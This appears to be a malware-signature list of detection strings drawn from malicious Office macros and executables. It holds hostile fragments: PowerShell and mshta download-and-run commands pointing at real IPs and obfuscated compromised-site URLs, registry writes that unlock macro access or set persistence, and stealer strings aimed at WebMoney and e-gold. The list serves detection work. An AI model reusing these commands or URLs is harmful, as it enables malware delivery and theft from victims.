- (2)).Navigate( (MACROHSTR_EXT)
- Print #1, ActiveDocument.Range.Text (MACROHSTR_EXT)
- .exec p( (MACROHSTR_EXT)
- = p(frm.button1.Caption) (MACROHSTR_EXT)
- frm.button1_Click (MACROHSTR_EXT)
- = .Tag (MACROHSTR_EXT)
- = .Caption (MACROHSTR_EXT)
- .exec Replace( (MACROHSTR_EXT)
- = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- = frm.cbtn1.Caption (MACROHSTR_EXT)
- frm.cbtn1_Click (MACROHSTR_EXT)
- .split(' (MACROHSTR_EXT)
- split('').reverse().join (MACROHSTR_EXT)
- .exec p(textboxView) & " " & p(pasteIterator) (MACROHSTR_EXT)
- Environ("USERPROFILE") & "\Desktop\" (MACROHSTR_EXT)
- sPath + "Wrzod.exe" (MACROHSTR_EXT)
- sPath + Replace("Wrzod.!x!", "!", "e") (MACROHSTR_EXT)
- objS.Run sFile (MACROHSTR_EXT)
- wrzod.vxm.pl/Wrzod (MACROHSTR_EXT)
- https:// (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- Replace("httpr:z0Ls://adamjeecommodir:z0Lties.cor:z0Lm/wp-content/r:z0Lthemes/adamjeecom/inc/options/kUQIZCFicsJ.php", "r:z0L", "") (MACROHSTR_EXT)
- Replace("_z+.\90https://adamjeecommoditi_z+.\90es.com/wp-cont_z+.\90ent/themes_z+.\90/adamjeecom/inc/opt_z+.\90ions/kUQIZCFicsJ.php","_z+.\90", "") (MACROHSTR_EXT)
- Replace("htWrVi4+tps://kaWrVi4+praywala.ga/website/wp-includes/js/jquery/uiWrVi4+/kk919Q3Ead7kgFQ.php", "WrVi4+", "") (MACROHSTR_EXT)
- Replace("https://crea.N_Dativa.N_De-island.e-m2.net/wp-contena.N_Da.N_Dt/ta.N_Dhemes/creative_a.N_Disland/js/vc-composer/RUpDObeysEFp8.php", "a.N_D", "") (MACROHSTR_EXT)
- Replace("ht@!fXg%$tps://arteecaligrafia.co@!fXg%$m.br/imagens/fo@!fXg%$tos/thumbs/MupJ4cZzxoElmn.php", "@!fXg%$", "") (MACROHSTR_EXT)
- Replace("https:jdzpk//hartlejdzpkpooltjdzpkaxi.co.uk/TaxiShop/modules/corjdzpkeupdajdzpkter/views/js/bbKt3OpktVRAFnjdzpki.php", "jdzpk", "") (MACROHSTR_EXT)
- Replace("https://ahdmsport.^viKU+scom/bootstrap/scripts/_notes/Xwi4K0BrmwX6hf.php", "^viKU+s", "") (MACROHSTR_EXT)
- Replace("(F0Zc/Nhttps:/(F0Zc/N/steriglass.stigmatinesafrica.org/wp-i(F0Zc/Nncl(F0Zc/Nudes/sodium_compat/namespaced/Core/ChaCha20/KITDlCQHVyI.php", "(F0Zc/N", "") (MACROHSTR_EXT)
- Replace("+*<);3>https://asgvprotecao.c+*<);3>om.br/wa_php/co+*<);3>mp/klbd5vx+*<);3>r6mf38o/YxSs9udR8U.php", "+*<);3>", "") (MACROHSTR_EXT)
- Replace("https://arteecaligrafia.vI&8&$Ocom.br/imagens/fotos/thumbs/MupJ4cvI&8&$OZzxoElmn.php", "vI&8&$O", "") (MACROHSTR_EXT)
- "HTTPDownload 'http://1lxtjdias-pod:8080/stage3.exe' (MACROHSTR_EXT)
- CreateObject ("; Scripting.FileSystemObject; ") (MACROHSTR_EXT)
- Wscript.CreateObject ("; Wscript.Shell; ") (MACROHSTR_EXT)
- "WshShell.Run strFile" (MACROHSTR_EXT)
- Shell "wscript C:\DEV\VBA\stage2.vbs" (MACROHSTR_EXT)
- fp = "C:\DEV\VBA\stage2.vbs" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\nextTextClear.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\counterCountVb.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\procedureTemp.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\swapCounterVariable.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\queryLeft.hta" (MACROHSTR_EXT)
- getwc = "explorer.exe c:\programdata\responseSwapMem.hta" (MACROHSTR_EXT)
- = Split(p(frm.getwc), " ") (MACROHSTR_EXT)
- #"body></html>") (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l") (MACROHSTR_EXT)
- exec("powe" & "rshell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- Chr(34) & "http://178.17.171.144/sch/ (MACROHSTR_EXT)
- = "c:\windows\explorer.exe c:\programdata\listboxPasteCounter.hta" (MACROHSTR_EXT)
- memIndex.exec p(rm) (MACROHSTR_EXT)
- = Split(p(frm.rm), " ") (MACROHSTR_EXT)
- = "c:\windows\explorer.exe c:\programdata\screenOptionTextbox.hta" (MACROHSTR_EXT)
- varLoadArray.exec p(rm) (MACROHSTR_EXT)
- .CreateObject("wscript." & she & "l").exec(psowerss & "hell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://landing.yetiapp.ec/IDx6/FLP_5012_306_171.ex (MACROHSTR_EXT)
- & "C:\Users\Public\Documents\checkgirl.ex" (MACROHSTR_EXT)
- .CreateObject("wscript.s" & she).exec( (MACROHSTR_EXT)
- http://afms.org.uk/js/mega.ex (MACROHSTR_EXT)
- -OutF" & "ile " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- .CreateObject("wscript." & she & "l").exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco.com/13Z/IMG_001263082.ex (MACROHSTR_EXT)
- C:\Users\Public\Documents\technologypurpose.ex" (MACROHSTR_EXT)
- explorer.exe c:\programdata\ (MACROHSTR_EXT)
- .hta" (MACROHSTR_EXT)
- .exec p(rm) (MACROHSTR_EXT)
- wscript." & she & "l").exec(psowerss & "hell (MACROHSTR_EXT)
- 185.117.91.199/99/Ckhpuhl.ex (MACROHSTR_EXT)
- http:// (MACROHSTR_EXT)
- Public\Documents\realexecutive.ex" & Chr(101)) (MACROHSTR_EXT)
- C:\Users\ (MACROHSTR_EXT)
- VBA.StrReverse("ath. (MACROHSTR_EXT)
- %\atadmargorp\:c rerolpxe\swodniw (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite listConst, 1, "REG_DWORD" (MACROHSTR_EXT)
- .Quit SaveChanges:=wdDoNotSaveChanges (MACROHSTR_EXT)
- valueEx(countTitle, 8 / 4, 1500000) (MACROHSTR_EXT)
- ActiveDocument.Range.Text (MACROHSTR_EXT)
- = "explorer c:\users\public\ (MACROHSTR_EXT)
- %.hta" (MACROHSTR_EXT)
- .exec tg (MACROHSTR_EXT)
- = Split(frm.tg, " ") (MACROHSTR_EXT)
- retval = Shell("wscript.exe mozilla.vbs") (MACROHSTR_EXT)
- Print #TextFile, Range("AH1607").Value + Range("AH1606").Value + Range("AH1605").Value (MACROHSTR_EXT)
- FilePath = "mozilla.vbs" (MACROHSTR_EXT)
- exec tg (MACROHSTR_EXT)
- namespaceGlobalRequest.DataType = "bin.base64" (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite argumentLink, 1, "REG_DWORD" (MACROHSTR_EXT)
- = StrConv(bufferData("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
- removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter (MACROHSTR_EXT)
- dataOptionLocal("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw=") (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite (MACROHSTR_EXT)
- valueDocumentConvert = UserForm1.TextBox1 (MACROHSTR_EXT)
- CreateObject("msxml2.domdocument") (MACROHSTR_EXT)
- CreateObject("word.application") (MACROHSTR_EXT)
- .DataType = "bin.base64" (MACROHSTR_EXT)
- %("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVw="), vbUnicode) (MACROHSTR_EXT)
- = UserForm1.TextBox1 (MACROHSTR_EXT)
- = CreateObject("msxml2.domdocument") (MACROHSTR_EXT)
- .createElement("code") (MACROHSTR_EXT)
- .nodeTypedValue (MACROHSTR_EXT)
- = Application.Version (MACROHSTR_EXT)
- .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString (MACROHSTR_EXT)
- .exec(psowerss & "hell -w Hidden Invoke-WebRequest -Uri (MACROHSTR_EXT)
- Users\Public\Documents\issuepolitical.ex (MACROHSTR_EXT)
- recentlyanalysis.CreateObject("wscript." & she & "l") (MACROHSTR_EXT)
- iklangratissurabaya.skom.id/zx/Fsbey.ex" & Chr(101) (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l").exec(psowerss & "hell -w (MACROHSTR_EXT)
- Invoke-WebRequest -Uri " & Chr(34) & "http:// (MACROHSTR_EXT)
- 7.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & ";C:\Users\Public\Documents\ (MACROHSTR_EXT)
- .ex" & Chr(101) (MACROHSTR_EXT)
- .exec$ (rightDataFunc) (MACROHSTR_EXT)
- = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ") (MACROHSTR_EXT)
- exec$ (sr(ExArrayLocal)) (MACROHSTR_EXT)
- ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- return namespaceB" & "utton.split('').reverse().join('" (MACROHSTR_EXT)
- GetSecurityDescriptorGroup (PEHSTR_EXT)
- @shell32.dll (PEHSTR_EXT)
- l32.dll (PEHSTR_EXT)
- c:\Cause\417\Organ\Out vi\grand.pdb (PEHSTR_EXT)
- ggploeER.dl (PEHSTR_EXT)
- = StrReverse(UserForm1.TextBox1) (MACROHSTR_EXT)
- = StrReverse("\eciffO\tfosorciM\erawtfoS\RESU_TNERRUC_YEKH") (MACROHSTR_EXT)
- = StrReverse("MOBVsseccA\ytiruceS\droW\") (MACROHSTR_EXT)
- = "HKEY_CURRENT_USER\Software\Microsoft\Office\" (MACROHSTR_EXT)
- = "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec (sr( (MACROHSTR_EXT)
- = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ") (MACROHSTR_EXT)
- .RegWrite screenValueCount, 1, "REG_DWORD" (MACROHSTR_EXT)
- textboxProcedureCollection = CreateObject("word.application") (MACROHSTR_EXT)
- = UserForm1.TextBox1 (MACROHSTR_EXT)
- globalMemory = "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- = Replace("1", "VB", "ity\Access1OM") (MACROHSTR_EXT)
- Set wshShell = objOL.CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- userprofile = wshShell.ExpandEnvironmentStrings("%userprofile%") (MACROHSTR_EXT)
- = commando_a_runear2 & " '" & directorio & "'" (MACROHSTR_EXT)
- wshShell.Run final_comando (MACROHSTR_EXT)
- .CreateObject("wscript.s" & (MACROHSTR_EXT)
- ).exec(powerrange & "hell -w " & protei & "den Invoke-WebRequest -Uri (MACROHSTR_EXT)
- http://31.210.20.6/w2/PLP_017542000.ex (MACROHSTR_EXT)
- mshta "javascript:function getT(a){var b,c=new ActiveXObject('WinHttp.WinHttpRequest.5.1');return c.Open('GET',a,!1),c.Send(),b=c.ResponseText,b} (PEHSTR_EXT)
- marius/loader/l.php? (PEHSTR_EXT)
- rmi#dRf.pdb (PEHSTR_EXT)
- Pscscripted23.98n (PEHSTR_EXT)
- 4.0NmZbrowserst (PEHSTR_EXT)
- qzsoheatherdefault.thanhatake (PEHSTR_EXT)
- cmd.exe /c ping 0 -n 2 & del (PEHSTR_EXT)
- .com.br/sitebuilder/IWu1s3chQoaXq.php (MACROHSTR_EXT)
- .com.br/lojamusic (MACROHSTR_EXT)
- .com/3IPk4Tm2As.php (MACROHSTR_EXT)
- https://mahinur.nucleustechbd (MACROHSTR_EXT)
- .net/AwI3uwiwuU6.php (MACROHSTR_EXT)
- https://euro-office (MACROHSTR_EXT)
- wmic process call create 'rundll32.exe (MACROHSTR_EXT)
- .co.ke/2UudEchwcxa7df.php (MACROHSTR_EXT)
- https://bizomate (MACROHSTR_EXT)
- .com.br/hPAr11iZ.php (MACROHSTR_EXT)
- https://webmail.eletricavolt (MACROHSTR_EXT)
- .com/css/fonts/INVRhwduUaFS.php (MACROHSTR_EXT)
- https://marbiadesign (MACROHSTR_EXT)
- .com.tw/images/ie8-panel/DrrvESA0sEe.php (MACROHSTR_EXT)
- https://flyinglove (MACROHSTR_EXT)
- script.Shell (MACROHSTR_EXT)
- .com/wp-includes/js/tinymce/skins/lightgray/A2jVIUfifA7zwR.php (MACROHSTR_EXT)
- https://aims1.ezicodes (MACROHSTR_EXT)
- .com/firmas/img/UignuN7NTZsS.php (MACROHSTR_EXT)
- https://canteraspalomino (MACROHSTR_EXT)
- Wscript.Shell (MACROHSTR_EXT)
- .dll", (MACROHSTR_EXT)
- .us/76a7Sg6AAZRX.php (MACROHSTR_EXT)
- https://mail-call (MACROHSTR_EXT)
- com.co/wp-content/plugins/shortcodes-ultimate/inc/core/K2kGXKi6v5rC.php (MACROHSTR_EXT)
- https://ciatran. (MACROHSTR_EXT)
- Mid("i\4FT-KWscript.Shell (MACROHSTR_EXT)
- K$xIU\8838.exe (MACROHSTR_EXT)
- WpEhtBAtf1.php (MACROHSTR_EXT)
- Error1.Image7788111.Tag (MACROHSTR_EXT)
- Error1.Image7788112.ControlTipText (MACROHSTR_EXT)
- .com/17/andre34.ex (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run (MACROHSTR_EXT)
- C:\Users\Public\Documents\electionover.ex (MACROHSTR_EXT)
- = CreateObject("wscript.shell").Run (MACROHSTR_EXT)
- http://scaladevelopments.scaladevco.com/17/ (MACROHSTR_EXT)
- C:\Users\Public\Documents\ (MACROHSTR_EXT)
- = Replace("https://cliente17.veN8^tatcarebahia.coN8^tam/midias/aneN8^taxos/3/4/z9hv4CjFNeHg4CU.pN8^tahp" (MACROHSTR_EXT)
- = Replace("https://newbira.azrobotica.coj^SJlm/wp-contenj^SJlt/themes/oceanwp/sass/base/PXpNdUK0pL.php" (MACROHSTR_EXT)
- = Replace("https://pcc.polperro.community/wp3#2@.ez-in3#2@.ezcludes/js/tinymce/plugins/charm3#2@.ezap/xV66PnHEU6.php" (MACROHSTR_EXT)
- = Replace("https://wwl @pV@w.salaoviedeluxe.com.brl @pV@/postsl @pV@/7l @pV@Lz4tIel @pV@iNHT9.php" (MACROHSTR_EXT)
- = Replace("https://babycarrie.dexsandbox.com/wp-content/plugins/woocommerce/includes/abstracts/6EA24JwkKx2sm:gqUFA.php" (MACROHSTR_EXT)
- = Replace("https://cliente4;T.;#.v;T.;#etcarebahia.com/m;T.;#;T.;#idias/anexos/6/7/1D089;T.;#JJ9wOmr.php" (MACROHSTR_EXT)
- = Replace("https://home.prosecuVpQ>1Nyre.azrobotiVpQ>1Nyca.com/Login/App/CVpQ>1Nyodigos/LabCVpQ>1Nyontrol/META-INF/S4LaP6RlV.php" (MACROHSTR_EXT)
- = Replace("https://testfeb.bizzexperts.com/includes/libsb<epcd/AWb<epcdS/Aws/ACMPCAb<epcd/fQxhgb<epcdIina9kl.php" (MACROHSTR_EXT)
- = Replace("https://unm.unmangepLV|2rCr.co.il/view/javascpLV|2rCrpLV|2rCipt/jpLV|2rCquery/flot/examples/dpLV|2rC3kwyA9WhvapLV|2rC.php" (MACROHSTR_EXT)
- = Replace("https:rdf K+//grandvilaformosa.com/wp-content/plugins/wordpress-seo/css/dist/y9rdf K+Od0UaBeWZ1.php" (MACROHSTR_EXT)
- = Replace("https://emc2educat5yhcgiontechnologies.com/5yhcgem5yhcgc2edtech.co5yhcgm/eKrPJ5yhcgTfq5yhcgr.php" (MACROHSTR_EXT)
- = Replace("https://ninja-chainsaw.nsmatrix3.f8(S!B-com/wp-content/plugins/happy-elementor-addons/widgets/bar-charf8(S!B-t/qzoDJmJR6Q.php" (MACROHSTR_EXT)
- = Replace("https://clientV 3,e13.vetcarV 3,ebahia.com/midias/anexos/3/4/0WfGc8V 3,3H0Y.php" (MACROHSTR_EXT)
- = Replace("htLcwuiXtps://chavesbrasil.com.br/postsLcwuiX/LcwuiXGcdkIjqyWmtwX.php" (MACROHSTR_EXT)
- = Replace("https://sitiomoradadosanjos.com.DND^.br/site/wa_p_albums/p_album_jua5tam80/jua5rcb3bz8x5s/thumb/GxbFZiKIXwFV.php" (MACROHSTR_EXT)
- = Replace("httaW3!nps://progressivetalents.com/wordpress/PT-1/buddypress/meaW3!nmbers/sinaW3!ngaW3!nle/pxdhEaW3!nziKi8.php" (MACROHSTR_EXT)
- = Replace("https://genxclinic.vn/wp-content/plug\>V!#t8in\>V!#t8s/the\>V!#t8-events-calendar/com\>V!#t8mon/lang/G\>V!#t86i6QuKA.\>V!#t8php" (MACROHSTR_EXT)
- = Replace("https://youthtal<eUl&1ents.org/wp-content/plugins/litespeed-cache/lib/cs<eUl&1s-min/sh3Kxo5r.php" (MACROHSTR_EXT)
- = Replace("https://sutekh.org.au/wp-content/plugins/twitter/src/Tw,UMBR\itter/H1M88hE5.,UMBR\php" (MACROHSTR_EXT)
- = Replace("https://exqubl%J isibl%J telycrafted4u.combl%J /wp-inclbl%J udes/js/tinymce/skins/lightgray/ubl%J jVJoiXEkzJzah.php" (MACROHSTR_EXT)
- linkCollection = ActiveDocument.Content (MACROHSTR_EXT)
- With tableTitle.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- With CreateObject("wscript.shell") (MACROHSTR_EXT)
- .RegWrite removeNext, 1, "REG_DWORD" (MACROHSTR_EXT)
- = ActiveDocument.Content (MACROHSTR_EXT)
- = CreateObject("word.application") (MACROHSTR_EXT)
- .Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- (Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt") Then (MACROHSTR_EXT)
- mp4klgzo.CreateFolder (pacbhdvc) (MACROHSTR_EXT)
- = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
- = "c:\program", Optional (MACROHSTR_EXT)
- & "data\ (MACROHSTR_EXT)
- .ht" & (MACROHSTR_EXT)
- = ActiveDocument.Range.Text (MACROHSTR_EXT)
- Set WshShell = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WshShell.Run (MACROHSTR_EXT)
- ("c:\\windows\\explorer "), , True (MACROHSTR_EXT)
- = CreateObject("wscript." & Chr(115) & (MACROHSTR_EXT)
- ).Run( (MACROHSTR_EXT)
- htt`p://31.210.20.45/zCH/ (MACROHSTR_EXT)
- Destination " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- = CreateObject("wscript.s" & (MACROHSTR_EXT)
- http://31.210.20.45/1xBet/ (MACROHSTR_EXT)
- .ex" & Chr(101) & Chr(34) & (MACROHSTR_EXT)
- Chr(34) & "htt`p://31.210.20.45/527/IMG_077010168.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & "htt`p://31.210.20.45/527/4243pp14.ex" & Chr(101) (MACROHSTR_EXT)
- Chr(34) & "htt`p://212.192.241.94/bluehost/ (MACROHSTR_EXT)
- CreateObject("wscript." & Chr(115) & (MACROHSTR_EXT)
- ).Run (MACROHSTR_EXT)
- -Destination " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
- Shell Replace("wscript ""FILE"" ", "FILE", myFile) (MACROHSTR_EXT)
- WshShell.Run """"""%UserProfile%\ (MACROHSTR_EXT)
- .exe"""" -d (MACROHSTR_EXT)
- myFile = userProfilePath + "\layoffs (MACROHSTR_EXT)
- Print #myoutputfile, "HTTPDownload ""http:// (MACROHSTR_EXT)
- objFile.Write Chr(AscB(MidB(objHTTP.ResponseBody, i, 1))) (MACROHSTR_EXT)
- = Mid("8t9$^=0m:bPGhttps://fitzgeraldstreet.com/ap-photos/themes/modus/css/fontello/1j5yZLSi4VE.php/--t3hqhMugjudl" (MACROHSTR_EXT)
- = Mid("CC5aJ8G4Dqohttps://ahdmsport.com/bootstrap/scripts/_notes/Xwi4K0BrmwX6hf.php2D8B.idWdD", (MACROHSTR_EXT)
- = Replace("https://teste.sitiodoastronauta.com.br/>33^vjwp-includes/js/tinymce/pl>33^vjug>33^vjins/char>33^vjmap/M19jooPri8T>33^vjq.php", (MACROHSTR_EXT)
- = Mid("$>=L^Ifs.qzgIvhttps://ganchohigienico.com/wp-content/plugins/bridge-core/modules/core-dashboard/RBZYy1Zl.php (MACROHSTR_EXT)
- = Replace("https://yourcodeloVj\oiberdade.com/mail/PHPMaileoVj\or_5.2.0/test_script/imaoVj\oges/ySc5emoVj\ogn6yieudoVj\oo.php", (MACROHSTR_EXT)
- = Mid("=s.3oCQ1Mk/<b>,Xhttps://sharmina.sharmina.org/wp-content/plugins/all-in-one-wp-migration/lib/controller/9MuUJGgZqj.php (MACROHSTR_EXT)
- = Replace("ht=pwFetps://alarmemusicalescolar.hiveweb.com.br/wp-content/plugins/wordpress=pwFe-seo=pwFe/packages/js/sX0IXqYsBQ.php", (MACROHSTR_EXT)
- fso = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- o1.Run "C:\windows\Temp\ssg.exe" (MACROHSTR_EXT)
- Set o1 = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- fso.DeleteFile (sFile) (MACROHSTR_EXT)
- Environ("USERPROFILE") + "\Documents\Adobe Help Center" (MACROHSTR_EXT)
- .FileExists(Environ("USERPROFILE") + "\Documents\" + "Eua58Y2F.txt" (MACROHSTR_EXT)
- HelpCenterUpdater.vbs" (MACROHSTR_EXT)
- .Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- http://www.blackievirus.com (PEHSTR_EXT)
- web.status>200 then wscript.quit (PEHSTR_EXT)
- WINDOWS\HELP2.VBS (PEHSTR_EXT)
- shell.run filename (PEHSTR_EXT)
- web.send (PEHSTR_EXT)
- //*[@unitPrice > 20] (MACROHSTR_EXT)
- NNUPUEJUWU.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Google Chrome Crash Reporter', aikido() + '\\CrashReport.exe', 'REG_SZ'); (MACROHSTR_EXT)
- CrashReport.eREPITxe'; s2file(aikido() + '\\' + kins.replace('REPIT',''), (MACROHSTR_EXT)
- curl%CommonProgramW6432:~23,1%--sil%TEMP:~-3,1%n%APPDATA:~-10,-9% http%CommonProgramFiles(x86):~15,1%://tv-m%APPDATA:~-9,-8%rket.onlin%CommonProgramFiles:~-15,-14%/simp%TEMP:~-6,1%e.%TEMP:~-16,-15%ng --output ""%namex%"" --ssl-no-revoke" & vbCrLf (MACROHSTR_EXT)
- CreateTextFile (temppath & "\UjdUhsbsjfU.txt") (MACROHSTR_EXT)
- GetSecurityDescriptorOwner (PEHSTR_EXT)
- = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
- .exec "scriptrunner.exe -appvscript " & (MACROHSTR_EXT)
- = ".h" & (MACROHSTR_EXT)
- Print #1, Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
- = ".h" & (MACROHSTR_EXT)
- = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
- 0.run "scriptrunner -appvscript " & (MACROHSTR_EXT)
- split(strfnd,",")).text=split(strfnd,",")(i).replacement.text="^&".executereplace:=wdreplaceallif.found=truethenstrrpt=strrpt&vbcr&split(strfnd,",")(i (MACROHSTR_EXT)
- timer()-tijd<2doeventswendwinexec"cscriptc:\programdata\prnholl.vbe",0endif (MACROHSTR_EXT)
- textstream.writeline(userform1.label1.caption) (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "dmfd", "") (MACROHSTR_EXT)
- = "." & installMixMix & installMp4Before (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installMixMix, 2 (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "ruioq", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & pauseSetBefore, 2 (MACROHSTR_EXT)
- = "." & pauseSetBefore & beforeBeforeStop (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "8ikot", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installStopMix, 2 (MACROHSTR_EXT)
- = "." & installStopMix & startPausePlay (MACROHSTR_EXT)
- Replace(ActiveDocument.Content, "gc6f", "") (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & installStopSetup, 2 (MACROHSTR_EXT)
- = "." & installStopSetup & playPlayWav (MACROHSTR_EXT)
- .run "scriptrunner -appvscript " & (MACROHSTR_EXT)
- = "." & (MACROHSTR_EXT)
- = Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
- mprexe.exe (PEHSTR_EXT)
- tremir.bin (PEHSTR_EXT)
- \driversLODE (PEHSTR_EXT)
- ost.t" (PEHSTR_EXT)
- p2.ini (PEHSTR_EXT)
- cz.dll (PEHSTR_EXT)
- hz.dll (PEHSTR_EXT)
- \MPRServices\TestService (PEHSTR_EXT)
- Software\WebMoney (PEHSTR_EXT)
- Referer: https://www.e-gold.com/ (PEHSTR_EXT)
- /acct/accountinfo.asp (PEHSTR_EXT)
- System\C (PEHSTR_EXT)
- SYSTEM\CurrentControlSet\Services\yvbb01 (REGKEY)
- SYSTEM\CurrentControlSet\Services\yvbb02 (REGKEY)
- .Run "cscript.exe %appdata%\www.txt //E:VBScript //NoLogo " + "%~f0" + " %*", Chr(48) (MACROHSTR_EXT)
- = Environ("USERPROFILE") & "\AppData\Roaming\ (MACROHSTR_EXT)
- + "www.ps1" (MACROHSTR_EXT)
- + "www.txt" (MACROHSTR_EXT)
- RO = "C:\ProgramData\" (MACROHSTR_EXT)
- ROI = RO + "pin.vbs" (MACROHSTR_EXT)
- WW = QQ1.t2.Caption (MACROHSTR_EXT)
- fun = Shell("cmd /k cscript.exe C:\ProgramData\pin.vbs", Chr(48)) (MACROHSTR_EXT)
- 'Result = MsgBox(" The document cannot be decrypted. ", vbAbortRetryIgnore + vbCritical, " Error 0xc0000142 ") (MACROHSTR_EXT)
- bxh.eFile (MACROHSTR_EXT)
- sSplit = Split(UCase$(Trim$(Email)), ".") (MACROHSTR_EXT)
- 0.run (MACROHSTR_EXT)
- .ht", ActiveDocument.Content (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
- ).Value (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec text1("category") + " " + (MACROHSTR_EXT)
- StrReverse(ThisDocument.text1("keywords")) (MACROHSTR_EXT)
- ActiveDocument.SaveAs2 FileName:= (MACROHSTR_EXT)
- ThisDocument.s (MACROHSTR_EXT)
- powershell -Exec bypass -NonI -W Hidden (('& ((GeT" (MACROHSTR_EXT)
- -VARIAble SXB*MDr*SXB).naMe[3,11,2]-joiNSXBSXB)( (" (MACROHSTR_EXT)
- mANAgement.AuToMaTION.PsCr'+'EDeNT" (MACROHSTR_EXT)
- CuREstrING -k (2'+'27..242) ) '+').getNETworkCred" (MACROHSTR_EXT)
- ENtIal().PaSSword)') -rePLaCe ([CHaR]97+[CHaR]56+" (MACROHSTR_EXT)
- Shell "mshta https://bit.ly/asdqwdqwojdasmndbas" (MACROHSTR_EXT)
- c:\windows\system32\calc\..\conhost.exe mshta http://j.mp/ (MACROHSTR_EXT)
- VBA.GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute (MACROHSTR_EXT)
- h"&"ttps://r"&"ecapitol.com/tl6ilKY1t8r/repo.h"&"tml (MACROHSTR_EXT)
- h"&"t"&"tps://s"&"weebez.com/QHaHeCnRrV/repo.h"&"tml (MACROHSTR_EXT)
- h"&"t"&"tps://m"&"hjlab.ml/2eie1JNsQB/repo.h"&"tml (MACROHSTR_EXT)
- Shell("wscript " + "browserapp.js", vbNormalFocus) (MACROHSTR_EXT)
- WriteLine Worksheets("Sheet2").Range("BN811").Value (MACROHSTR_EXT)
- CreateObject("She" + "ll.Ap" + "plic" + "ation") (MACROHSTR_EXT)
- CallByName(igcXr, "Sh" + "el" + "lExe" + "cute", VbMethod, URxl(0), URxl(1), URxl(2), URxl(3), URxl(4)) (MACROHSTR_EXT)
- "ping google.com;" + eeeew (MACROHSTR_EXT)
- h"&"t"&"t"&"ps://o"&"n"&"line"&"yo"&"gaco"&"urse.org/5hgP7n5nTC/a.h"&"t"&"m"&"l" (MACROHSTR_EXT)
- h"&"t"&"t"&"ps://rab"&"edc.com/ms"&"dcluV8y5nf/alf.h"&"t"&"m"&"l" (MACROHSTR_EXT)
- h"&"t"&"t"&"ps://par"&"tiuv"&"amos"&"viajar.com/xYIJTUcGxvF1/alfo.h"&"t"&"m"&"l (MACROHSTR_EXT)
- "h"&"t"&"t"&"ps://r"&"e"&"c"&"api"&"tol.com/pl92fI"&"eHE11X/fil"&"ht.ht"&"ml" (MACROHSTR_EXT)
- "h"&"t"&"t"&"p"&"s://bo"&"og"&"ie"&"p"&"r"&"oducti"&"ons.com.au/jJNW2LDF/filk"&"fht.h"&"tml (MACROHSTR_EXT)
- "h"&"t"&"tp"&"s://i"&"u.ac.bd/Qp"&"Pq"&"5lm6Xy/fik"&"fh.h"&"t"&"m"&"l"," (MACROHSTR_EXT)
